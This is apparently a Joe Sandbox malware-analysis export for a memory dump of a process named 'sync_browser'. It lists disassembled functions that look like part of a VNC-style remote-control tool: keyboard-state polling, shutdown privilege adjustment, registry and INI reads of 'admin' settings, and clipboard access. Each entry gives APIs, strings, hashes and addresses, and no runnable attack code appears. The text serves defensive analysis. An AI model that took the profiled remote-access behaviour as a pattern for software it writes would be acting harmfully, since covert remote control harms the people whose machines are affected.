Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: File$FindFirstModuleName
String ID: *.dsm
API String ID: 1519589655-1970359449
Opcode ID: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
Instruction ID: 734bb106c044b2b3c917796f1e23cdd47802fafe2575b308fa07ef7509c65789
Opcode Fuzzy Hash: 5ec88052d5adebc3db2df3dc82cb1158468950cb75ad4b7486c7f1220c09e049
Instruction Fuzzy Hash: 8A317622B2868595E760CB35E9443BBA394FB587B0F405331EA7E836D4DE2DD10DC700

Function 00007FF67E8177F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 53registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817840
RegQueryValueExA.ADVAPI32 ref: 00007FF67E81787D
GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E8178AF

Strings

UseRegistry, xrefs: 00007FF67E81782F
admin, xrefs: 00007FF67E817836
admin_auth, xrefs: 00007FF67E8178A5

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$FileModuleNameQueryValue
String ID: UseRegistry$admin$admin_auth
API String ID: 1028385882-3376419731
Opcode ID: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
Instruction ID: 0779ceac0bf7bf9d9ca50721234d632032ba758e299b6060b6f19bce8dcb00ff
Opcode Fuzzy Hash: d5f9d5c0af733a8a18aaad5fcf10d0583086e22d43d578638aeb5c775166167f
Instruction Fuzzy Hash: CA213533638A46C5FB50CB50E8446AAB3A4FB99794F801135FA5E83B58CF3DD949CB00

Function 00007FF67E811550 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47keyboardCOMMON

Download Yara Rule

APIs

GetAsyncKeyState.USER32 ref: 00007FF67E811561
MapVirtualKeyA.USER32 ref: 00007FF67E8115BA
GetAsyncKeyState.USER32 ref: 00007FF67E8115D3

Strings

vnckeymap.cpp : new state %d (%s), xrefs: 00007FF67E8115D9
vnckeymap.cpp : setshiftstate %d - (%s->%s), xrefs: 00007FF67E811591
down, xrefs: 00007FF67E81158A

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: AsyncState$Virtual
String ID: down$vnckeymap.cpp : new state %d (%s)$vnckeymap.cpp : setshiftstate %d - (%s->%s)
API String ID: 2891131044-1915745809
Opcode ID: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction ID: 9672d8912079a810187a26feba555bbe0bcb58369c9f5c5c9862f5d4e78c56ad
Opcode Fuzzy Hash: af929e24d0095cd63bb2d8a54ee9630447cb1a074a3e2900237919080e080432
Instruction Fuzzy Hash: 7F11BF23B38E9282E6118F14F4001AAA769FBA8749F580536FD8EC76A5CF3CD55EC740

Function 00007FF67E7D34B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32 ref: 00007FF67E7D34C3
OpenProcessToken.ADVAPI32 ref: 00007FF67E7D34D6
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF67E7D34EE
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF67E7D351F
ExitWindowsEx.USER32 ref: 00007FF67E7D352E

Strings

SeShutdownPrivilege, xrefs: 00007FF67E7D34E5

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentExitLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 1314775590-3733053543
Opcode ID: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction ID: dfea1f3c86b4736e4fdecf0656e99eb5bbba217affc6903466eaba0fbc2fdab2
Opcode Fuzzy Hash: 363ed4c67b5ca12eadee3f550d356d17c608b08a1ee121bb449b59d57746889a
Instruction Fuzzy Hash: FF014076A28A4291F750DB24F8552AAB3A4FF99744F505035F64E87664DF3DD04CCB00

Function 00007FF67E817750 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 30registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817789
RegCloseKey.ADVAPI32 ref: 00007FF67E8177A0
RegCloseKey.ADVAPI32 ref: 00007FF67E8177B2
RegCloseKey.ADVAPI32 ref: 00007FF67E8177C4

Strings

UseRegistry, xrefs: 00007FF67E817778
admin, xrefs: 00007FF67E81777F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Close$FileModuleNamePrivateProfile
String ID: UseRegistry$admin
API String ID: 3032973919-2802730080
Opcode ID: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
Instruction ID: 171d48f5ab5d27fa99b3acea3c66aa4dce28c17491a7a3139fb7515f6109e66b
Opcode Fuzzy Hash: f394e00a07ad10370d3a9fb3f4169cee617936cad869a8b398f64821c48fdab7
Instruction Fuzzy Hash: 60014427E39A0381FE61AB54E4643B5A364FFA6744F800536F91EC6561CE3DE54DC710

Function 00007FF67E888C90 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

__tzset.LIBCMT ref: 00007FF67E888DF3
_get_daylight.LIBCMT ref: 00007FF67E888DFC
_get_daylight.LIBCMT ref: 00007FF67E888E0D
_get_daylight.LIBCMT ref: 00007FF67E888E1E
_isindst.LIBCMT ref: 00007FF67E888EDA

Part of subcall function 00007FF67E884930: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF67E8849D2), ref: 00007FF67E884948

_errno.LIBCMT ref: 00007FF67E888F2E

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: _get_daylight$CurrentProcess__tzset_errno_isindst
String ID:
API String ID: 1870958493-0
Opcode ID: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction ID: e08f90a11b077dced49db5dc1ba727d23d895f2c7b1dc6ba1825798d6766d3ec
Opcode Fuzzy Hash: d42586344bd6afb1d42c0f7a2c15e1262e76e9d2421f5cfeb9a02ae854df84cf
Instruction Fuzzy Hash: 4971D873F345024BE728CB24D9516BCA696AB74358F948135FE0DCAAD9DF3CA949C600

Function 00007FF67E8847E4 Relevance: 9.1, APIs: 6, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlCaptureContext.KERNEL32 ref: 00007FF67E884851
RtlLookupFunctionEntry.KERNEL32 ref: 00007FF67E884869
RtlVirtualUnwind.KERNEL32 ref: 00007FF67E8848A3
IsDebuggerPresent.KERNEL32 ref: 00007FF67E8848D9
SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF67E8848E3
UnhandledExceptionFilter.KERNEL32 ref: 00007FF67E8848EE

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
String ID:
API String ID: 1239891234-0
Opcode ID: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
Instruction ID: 23eabe82a8fd1f71cb506c1296c86c4f925fa513ca6d2c0480f0b5ce6c7ebf39
Opcode Fuzzy Hash: cab22b7f63e68bd4fe1f659d6095baf5ecdb6c5b170d8f81b70fd2e30acf9a7e
Instruction Fuzzy Hash: 73313133A28B8289EB60CF25E8406AEB3A4FB94754F540135FA9D93B95DF3CD549CB00

Function 00007FF67E7F13A0 Relevance: 9.0, APIs: 6, Instructions: 42clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 00007FF67E7F13B0
EmptyClipboard.USER32 ref: 00007FF67E7F13BA
GlobalAlloc.KERNEL32 ref: 00007FF67E7F13DF
GlobalLock.KERNEL32 ref: 00007FF67E7F13F0
GlobalUnlock.KERNEL32 ref: 00007FF67E7F1411
SetClipboardData.USER32 ref: 00007FF67E7F141F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: ClipboardGlobal$AllocDataEmptyLockOpenUnlock
String ID:
API String ID: 2715784024-0
Opcode ID: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction ID: aae43235343641499b5cbc8f2109a4ba70a9e6bfa0bd0b8b920abd8c4d1025c5
Opcode Fuzzy Hash: e11c53b316a9bfdc0ba5bcfd4052570f78fa6fe53520f5204ff61f5d8110080f
Instruction Fuzzy Hash: C201B112F3968282FF044F29A818275A295EFA5BE4F081234FD2E877C1DE2CE04AC610

Function 00007FF67E7F48B0 Relevance: 9.0, APIs: 4, Strings: 1, Instructions: 206windowCOMMON

Download Yara Rule

APIs

IsIconic.USER32 ref: 00007FF67E7F4915

Strings

0, xrefs: 00007FF67E7F49B7

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: Iconic
String ID: 0
API String ID: 110040809-4108050209
Opcode ID: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
Instruction ID: 45992f6a0d66ab6b4fb7fe504da470d509ae474ad9bb786dc1553d89613e99be
Opcode Fuzzy Hash: ada12bffe0504ce749bfb447d148339bb7949db47e61c86c1c89a82587fb054e
Instruction Fuzzy Hash: FBA119336146918BE758CF39D541AA8B7E0FB58B54F048039EB59C7649EF3CE8A9CB10

Function 00007FF67E817D50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817D89

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2

Strings

UseRegistry, xrefs: 00007FF67E817D78
group3, xrefs: 00007FF67E817DAC, 00007FF67E817DE3
admin, xrefs: 00007FF67E817D7F

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group3
API String ID: 1728753321-3776872688
Opcode ID: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction ID: f5ec5bdaa1abbe4af1da3c781a83332d7b90ed317a86c50d2169384621419904
Opcode Fuzzy Hash: da8d5682ec0159b53c6e6ac02bc9a146a6fe897d91bd88be9db6412787fbbace
Instruction Fuzzy Hash: A7112133E3858281FA61AB60F4613F9A350FFA9340F84013AF65E866A6CE3DE50DC700

Function 00007FF67E817BD0 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817C09

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2

Strings

UseRegistry, xrefs: 00007FF67E817BF8
admin, xrefs: 00007FF67E817BFF
group1, xrefs: 00007FF67E817C2C, 00007FF67E817C63

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group1
API String ID: 1728753321-252764636
Opcode ID: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction ID: 6323602c9b40286a54d385ba8c43e6161c004550d3024f5c2c18a618ead59ead
Opcode Fuzzy Hash: dc4ee2f34963cf6fb66591f643b46c4958349bc6d42a33ae21c770aef2cc3bec
Instruction Fuzzy Hash: 05111223E3898281EA61AB50F4913F9A351FFA9340F840139F55D866A6CE3DE50DD700

Function 00007FF67E817C90 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817CC9

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E817722

Part of subcall function 00007FF67E8178E0: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E81792E
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E81796A
Part of subcall function 00007FF67E8178E0: RegQueryValueExA.ADVAPI32 ref: 00007FF67E8179B2

Strings

UseRegistry, xrefs: 00007FF67E817CB8
group2, xrefs: 00007FF67E817CEC, 00007FF67E817D23
admin, xrefs: 00007FF67E817CBF

Memory Dump Source

Source File: 00000016.00000002.3193575048.00007FF67E7C1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF67E7C0000, based on PE: true

Associated: 00000016.00000002.3193546173.00007FF67E7C0000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193682358.00007FF67E899000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193733474.00007FF67E8CD000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193759595.00007FF67E8CF000.00000008.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E8D0000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E91B000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193789691.00007FF67E948000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E981000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67E9F4000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000016.00000002.3193857745.00007FF67EA3C000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_22_2_7ff67e7c0000_sync_browser.jbxd

Yara matches

Similarity

API ID: PrivateProfile$CreateQueryValue$FileModuleName
String ID: UseRegistry$admin$group2
API String ID: 1728753321-2518265958
Opcode ID: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction ID: d11b609e16e0cee665b7c4a018224ae58a3bc7ed8cfbc15348f93237c89b0dd1
Opcode Fuzzy Hash: 42ecbddd9c1df14715f3163af6785be1f325581b827072a0f24e6963c90d4554
Instruction Fuzzy Hash: 4D112533E3854281FA61AB60E4513F9A350FFA9340F840139F55E865A6CE3DE50DC700

Function 00007FF67E817F50 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF67E7CD390: GetModuleFileNameA.KERNEL32 ref: 00007FF67E7CD3BB

GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817F8D

Part of subcall function 00007FF67E817650: GetPrivateProfileIntA.KERNEL32 ref: 00007FF67E817689
Part of subcall function 00007FF67E817650: RegCreateKeyExA.ADVAPI32 ref: 00007FF67E8176DD
